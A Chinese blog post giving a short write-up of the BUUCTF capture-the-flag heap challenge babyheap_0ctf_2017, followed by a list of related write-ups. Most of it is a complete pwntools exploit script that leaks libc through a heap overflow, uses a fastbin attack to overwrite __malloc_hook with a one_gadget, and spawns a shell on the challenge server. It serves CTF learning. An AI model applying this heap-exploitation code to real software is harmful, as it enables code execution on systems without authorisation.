buuctf babyheap_0ctf_2017

最新推荐文章于 2023-03-21 07:29:32 发布
最新推荐文章于 2023-03-21 07:29:32 发布
阅读量847 收藏 2
点赞数 2
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/carol2358/article/details/105946384
版权

在这里插入图片描述
主体函数

我们可以在fill里发现可以任意输入字节

在这里插入图片描述
接下来我们就用chunk extend和off by one

在这里插入图片描述
在这里插入图片描述
图片来自

https://bbs.pediy.com/thread-246786.htm

具体看exp
exp:

from pwn import *
#p=process('./babyheap_0ctf_2017')
e=ELF('/lib/x86_64-linux-gnu/libc-2.23.so')
p = remote('node3.buuoj.cn', 26497)
p.readuntil('Command:')
context(log_level='debug')
def alloc(a):
    p.writeline('1')
    p.readuntil('Size:')
    p.writeline(str(a))
    #p.readuntil('Command:')
def update(a,b,c):
    p.writeline('2')
    p.readuntil('Index:')
    p.writeline(str(a))
    p.readuntil('Size:')
    p.writeline(str(b))
    p.readuntil('Content:')
    p.write(c)
    p.readuntil('Command:')
def dele(a):  
    p.writeline('3')   
    p.readuntil('Index:')
    p.writeline(str(a))
    p.readuntil('Command:')

def show(a):
    p.writeline('4')
    p.readuntil('Index:')
    p.writeline(str(a))

alloc(0x18) #0
alloc(0x18) #1
alloc(0x68) #2
alloc(0x68) #3

update(0, 0x20, 'a'*0x18+p64(0x91)) #size1+size2
dele(1) #1    #free1
alloc(0x18)   #alloc1
show(2)     #fd, bk at alloc2
#gdb.attach(p)

libcbase = u64(p.recvuntil('\x7f')[-6:].ljust(8, '\x00')) - 0x3c4b78
log.info(hex(libcbase))
malloc_hook = libcbase + 0x3c4aed
log.info(hex(malloc_hook))
one = libcbase + 0x4526a

dele(2)  #free2
#gdb.attach(p)
update(1, 0x28, 'a'*0x18+p64(0x71)+p64(malloc_hook))   #fd at 2->malloc_hook
#gdb.attach(p)

alloc(0x68)  #2
#gdb.attach(p)
alloc(0x68)  #4 at malloc_hook
#gdb.attach(p)

update(4, 0x1b, p8(2)*3+p64(2)*2+p64(one))
#gdb.attach(p)
alloc(255) 

p.interactive()
真岛忍
关注
  • 2
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
babyheap_0ctf_2017 详细解析【BUUCTF
qq_41696518的博客
09-06 2748
好家伙,保护全开,根据文件名,可以判断这是一道堆题目,刷了这么久,终于遇到堆题目了,解析就写的详细点。先看main函数,很简单就是各类个目录函数,一步一步来看把。
0ctf_2017_babyheap详解
像初雪一样自由洒落
04-19 3745
本文主要列出0ctf_2017_babyheap的详细过程 主要参考:https://bbs.pediy.com/thread-223461.htm 程序流程 allocate:申请size大小的块 fill:对idx的块,设置size,并填入content free:释放idx的块 dump:打印idx的块内容 漏洞分析 fill中的size可以重新设置,故可以造成堆溢出。 方法:fastbin attack double free泄露libc 【small/large chunk释放,fd和.
babyheap_0ctf_2017 详解
Bi0x的博客
11-24 1609
题目地址: https://buuoj.cn/challenges#babyheap_0ctf_2017 本题为 64 位,以下内容以64位为例 信息收集 弄到题目文件先 checksec 保护全开,那必然就要想办法泄漏出 libc 基地址的偏移量来实现调用其他函数 先逆向一下文件,对于 main 函数大概的构造情况如下 对于 allocate 函数,里面用户输入 size 后根据其大小进行内存分配 这里使用了 calloc函数,其与malloc不同的是分配内存后会把数据.
我又pwn啦——*刷题篇 babyheap_0ctf_2017
m0_64195960的博客
07-28 622
babyheap
babyheap_0_ctf_2017
m0_48127441的博客
04-01 194
漏洞就是劫持程序控制流 先对程序进行分析 alloc(Length) //struct a_malloc{int use_or_not; int Length;void*base;int un_use} ; struct a_malloc malloc_array[16]; fill(任意长度) free(指定块) dump(输出对应chunk的Length)//可以填充任意长度的数据,即可以修改 chunk头 目标 -->劫持程序控制流 --> 把__malloc_hoo...
ctf-tools-linux-master_ctf工具_ctf工具_CTFtools_CTF_Tools_
10-01
CTF常用小工具你值得拥有那个。。。。111
welcome_CTF.exe
08-07
一道简单的ctf逆向题目,取自于成信大2019四叶草安全杯比赛
ctf脚本_ctfpy脚本_ctf跑脚本_ctf_ctf脚本密码_
09-30
ctf 密码学 脚本 合集 非常 nice
hac.zip_CTF信息隐写_ctf
09-23
CTF信息隐写,非常简单的入门小实验,带你走进CTF
CTF神器_ctf
09-23
对网站文件管理,对网站后台文件进行扫描。。
0ctf Babyheap 2017
Bill
03-11 6362
0ctf 2017 BabyHeap 1. 题目分析 Arch: amd64-64-little RELRO: Full RELRO Stack: Canary found NX: NX enabled PIE: PIE enabled 如果RELRO: Partial RELRO, 有可能是格式化字符串。 结论...
BUUCTF 0ctf_2017_babyheap
m0_57754423的博客
02-15 206
简单说一下这个题目的思路: 1.泄露libc: 编辑chunk的时候存在堆溢出,可以通过堆溢出,修改两个不同的指针,指向同一个chunk,随后free掉其中一个,即可dump其中内存,main_arena的地址。 2.同样再次利用堆溢出,修改其中一个chunk的fd指针为__malloc_hook,然后修改malloc_hook为one_gadget。 这里解答一个疑惑,为什么不写got表? 1,首先 RELRO保护全开,是不可写的。 2,其次,bss段上很难找到数据通过size检查。 完整.
babyheap_0ctf_2017
qq_53263789的博客
09-10 1090
babyheap_0ctf_2017
2017 0ctf babyheap
Grxer的博客
03-21 122
刚开始的init_my会利用/dev/urandom随机函数用mmap随机映射一块内存给我们存放指针,没有了确定地址,我们就不好去构成unlink攻击allocate()根据我们输入的size构成如下一个结构体,把指针放在mmap的堆上fill()也会根据我们的size进行读写,任意堆溢出,这就好办了freechunk()挺好的,该置零的都置零。
[BUUCTF]PWN——babyheap_0ctf_2017
mcmuyanga的博客
12-23 2586
[BUUCTF]PWN19——babyheap_0ctf_2017 附件 步骤: 例行检查,64位,保护全开 试运行一下程序,看到这个布局菜单,知道了这是一道堆的题目,第一次接触堆的小伙伴可以去看一下这个视频,我也刚接触堆不久,有些地方我也讲不清楚 ida载入,先看一下main函数,做堆题的时候需要将程序给理清楚了,这边的几个选项函数一开始不是如图所示的,我们可以右击给他重新命名一下,为了让我们看的更清楚 add,就是简单的创建一个chunk edit,我们写入数据的长度是我们可以自己控制的,存在堆
绝对详细的babyheap_0ctf_2017题解
xieyichensss的博客
04-24 996
这是我第一次做堆题,其他师傅的wp都看了一个周左右,才把大概所有我不明白的地方搞懂。 直接上其他师傅的exp,然后逐步分析叭。(希望我尽快可以自己做堆) from pwn_debug import * pdbg = pwn_debug(‘babyheap_0ctf_2017’) pdbg.remote(‘node3.buuoj.cn’,26076) p = pdbg.run(‘remote’) def allocate(size): p.recvuntil('Command: ') p.sendline(‘
【PWN系列】 Buucf babyheap_0ctf_2017 Writeup
Vicl1fe的博客
11-27 624
个人博客地址 http://www.darkerbox.com 欢迎大家学习交流 参考网址: https://www.cnblogs.com/luoleqi/p/12349714.html 分析 参考网址说的已经不错了,主要问题出现在fill功能,只要chunk存在,即可写任意长度的字符。 主要还是利用fasbin attack和unsorted的特性(下面会说到)来修改__malloc_hook拿到shell。 这里我来实际走一遍exp的流程,下面的exp我用的是本地的libc。 利用 下面的代码定
0ctf 2017 babyheap writeup
jmp esp
03-26 6272
前言坑比的我比赛的时候没有做。。第二天有课,赛后看了看,题目其实没啥太多难度,可能也就是细节上需要注意一下吧题目题目功能简单介绍一下题目功能,因为我本机是用的linux,ida在虚拟机里,ida的复制又不是特别方便,所以我就不复制分析的情况了,具体分析自己做一下练习一下也比较好,就把大致的情况说明一下。首先是主菜单===== Baby Heap in 2017 ===== 1. Allocate 2
x_ctf_b0verfl0w
最新发布
10-22
x_ctf_b0verfl0w是一道栈溢出的题目,需要利用栈溢出漏洞来实现攻击。攻击者需要构造一个ROP链,通过泄露puts函数的地址,计算出libc的基地址,然后再通过libc中的system函数和/bin/sh字符串的地址来执行系统命令。...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值